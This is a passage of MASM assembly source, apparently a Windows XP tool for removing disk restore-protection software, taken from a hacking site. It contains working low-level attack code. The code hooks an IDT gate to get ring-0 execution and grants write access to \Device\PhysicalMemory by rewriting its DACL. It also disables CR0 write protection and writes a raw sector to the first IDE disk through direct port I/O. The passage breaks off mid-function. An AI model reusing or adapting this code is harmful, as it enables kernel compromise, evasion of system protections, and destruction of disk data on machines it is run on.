mov dx, word ptr [ebx+6]  &#59; Save the current gate highword
 shl edx, 16d
 mov dx, word ptr [ebx]  &#59; lowword
 mov [lpOldGate], edx

 mov eax,  Ring0  &#59; "install hook" - that is newgate
 mov word ptr [ebx], ax  &#59; lowword
 shr eax, 16d
 mov word ptr [ebx+6], ax  &#59; highword

 int  ExceptionUsed   &#59; cause exception

 mov ebx, dword ptr [IDT+2]  &#59; restore gate
 add ebx, 8*ExceptionUsed
 mov edx, [lpOldGate]
 mov word ptr [ebx], dx
 shr edx, 16d
 mov word ptr [ebx+6], dx
 ret
ToRing0Code endp
end start

--------------------------------------------------------------------------------

;for winxp
.686p
.model flat, stdcall
option casemap :none   &#59; case sensitive
&#59; #########################################################################
include \masm32\include\windows.inc
include \masm32\include\user32.inc
include \masm32\include\kernel32.inc
include \masm32\include\advapi32.inc
     
includelib \masm32\lib\user32.lib
includelib \masm32\lib\kernel32.lib
includelib \masm32\lib\advapi32.lib
DEBUG = TRUE
ShowError proto :DWORD

&#59;常量定义
NULL  = 0
MB_OK = 0
INVALID_HANDLE_value = -1
GENERIC_READ  = 80000000H
GENERIC_WRITE = 40000000H
FILE_SHARE_READ   = 1
FILE_SHARE_WRITE  = 2
FILE_SHARE_DELETE = 4
OPEN_EXISTING   = 3

HMODULE typedef dword
NTSTATUS typedef dword
PACL typedef dword
PSECURITY_DEscriptOR typedef dword

OBJ_INHERIT=2
OBJ_PERMANENT=10h
OBJ_EXCLUSIVE=20h
OBJ_CASE_INSENSITIVE=40h
OBJ_OPENIF=80h
OBJ_OPENLINK =100h
OBJ_KERNEL_HANDLE=200
OBJ_VALID_ATTRIBUTES=3F2h

SE_KERNEL_OBJECT = 6
GRANT_ACCESS =1
NO_INHERITANCE =0
TRUSTEE_IS_NAME=1
TRUSTEE_IS_USER=1
STATUS_SUCCESS =0
STATUS_ACCESS_DENIED =0C0000022h

STATUS_ACCESS_VIOLATION equ 0C0000005h
STATUS_INFO_LENGTH_MISMATCH equ 0C0000004h
SystemModuleInformation               equ 11
PVOID  TYPEDEF DWORD
UNLONG TYPEDEF DWORD
CHAR   TYPEDEF BYTE

UNICODE_STRING struct
   nLength word ?
   MaximumLength word ?
   Buffer dword ?
UNICODE_STRING ends

OBJECT_ATTRIBUTES struct
   nLength dword ?
   RootDirectory HANDLE ?
   ObjectName dword ?&#59;PUNICODE_STRING 
   Attributes dword ?&#59;
   SecurityDescriptor dword ?&#59; PVOID // Points to type SECURITY_DEscriptOR
   SecurityQualityOfService dword ?&#59;PVOID  // Points to type SECURITY_QUALITY_OF_SERVICE

OBJECT_ATTRIBUTES ends

TRUSTEE struct
    pMultipleTrustee dword ?&#59;PTRUSTEE                   
    MultipleTrusteeOperation dword ?&#59; MULTIPLE_TRUSTEE_OPERATION 
    TrusteeForm dword ?&#59;TRUSTEE_FORM
    TrusteeType dword ?&#59;TRUSTEE_TYPE               
    ptstrName dword ?&#59;LPTSTR                     
TRUSTEE ends

EXPLICIT_ACCESS  struct
    grfAccessPermissions DWORD   ?    
    grfAccessMode  dword ? &#59;ACCESS_MODE
    grfInheritance DWORD ?       &#59;
    Trustee TRUSTEE  <>    &#59;
EXPLICIT_ACCESS ends

MyGATE     struct    &#59;门结构类型定义
    OFFSETL  WORD      ?  &#59;32位偏移的低16位
    SELECTOR WORd      ?  &#59;选择子
    DCOUNT   BYTE      ?  &#59;双字计数字段
    GTYPE    BYTE      ?  &#59;类型
    OFFSETH  WORD     ?  &#59;32位偏移的高16位
MyGATE     ends

SetPhyscialMemorySectionCanBeWrited proto :dword
MiniMmGetPhysicalAddress proto :dword

ENTERRING0 macro
pushad 
pushfd
cli
mov eax,cr0   &#59;get rid off readonly protect
and eax,0fffeffffh
mov cr0,eax
endm

LEAVERING0 macro
mov eax,cr0 &#59;restore readonly protect
or eax,10000h
mov cr0,eax
sti
popfd
popad 
retf
endm

UNICODE_STR macro str
irpc _c,
db ’&_c’
db 0
endm
endm

.data?
GdtLimit dw ?
GdtAddr dd ?

mapAddr dd ?
OldEsp dd ?

readed  dw ?

Buffer  db 512 dup(?)
.data
 FileName db ’\\.\PHYSICALDRIVE0’,0
 align 4    &#59;双字对齐
 readed1 dd 0
 
 hFile dd 0
 
 
 ErrCreate db ’请在NT下运行该程序!’,0
 ErrRead  db ’读盘错误！’,0
 

align 4
objname dw objnamestr_size,objnamestr_size+2
objnameptr dd 0
objnamestr equ this byte
UNICODE_STR <\Device\PhysicalMemory>
objnamestr_size equ $-objnamestr

align 4
ObjAttr db 24 dup (0)
IsIdtFlag dd 0
Callgt dq 0        &#59;call gate’s sel:off
Caption  db ’天龙还原精灵卸载器2.0 FOR:WINXP’,0
ShowText db ’该程序用来卸载还原类软件 by:风般的男人(www.lsky.net www.hacksoft.com)’,0
.code
_Ring0Proc PROC    &#59; Ring0 code here..
 ENTERRING0
 mov     dx,1f6h         &#59;Drive and head port

mov     al,0a0h         &#59;Drive 0, head 0
 out     dx,al
 
 mov     dx,1f2h         &#59;Sector count port
 mov     al,1            &#59;Write one sector
 out     dx,al
 
 mov     dx,1f3h         &#59;Sector number port
 mov     al,1            &#59;Wrote to sector two
 out     dx,al
 
 mov     dx,1f4h         &#59;Cylinder low port
 mov     al,0            &#59;Cylinder 0
 out     dx,al
 
 mov     dx,1f5h         &#59;Cylinder high port
 mov     al,0            &#59;The rest of the cylinder 0
 out     dx,al
 
 mov     dx,1f7h         &#59;Command port
 mov     al,30h          &#59;Write with retry.
 out     dx,al
oogle:
 in      al,dx
 test    al,8            &#59;Wait for sector buffer ready.
 jz      oogle
 xor ecx,ecx
 mov     cx,512/2        &#59;One sector /2
 mov     esi,offset Buffer
 mov     dx,1f0h         &#59;Data port - data comes in and out of here.
        rep outsw        &#59;Send it.
 LEAVERING0
_Ring0Proc ENDP
Ring0CodeLen=$-_Ring0Proc

SetPhyscialMemorySectionCanBeWrited proc uses ebx esi edi hSection:HANDLE
local pDacl: PACL
local pNewDacl:PACL
local pSD :PSECURITY_DEscriptOR
local dwRes:DWORD &#59;
local ea:EXPLICIT_ACCESS &#59;
invoke GetSecurityInfo,hSection,SE_KERNEL_OBJECT,DACL_SECURITY_INFORMATION,\
                  NULL,NULL, addr pDacl,NULL, addr pSD
cmp eax,ERROR_SUCCESS
jz @f
jmp OutSet
@@:
mov dwRes,eax
mov ea.grfAccessPermissions ,SECTION_MAP_WRITE&#59;2
mov ea.grfAccessMode ,GRANT_ACCESS&#59;1
mov ea.grfInheritance,NO_INHERITANCE&#59;0
mov ea.Trustee.pMultipleTrustee,0
mov ea.Trustee.MultipleTrusteeOperation,0

mov ea.Trustee.TrusteeForm,TRUSTEE_IS_NAME&#59;1
mov ea.Trustee.TrusteeType,TRUSTEE_IS_USER&#59;1
call @f
db "CURRENT_USER",0
@@: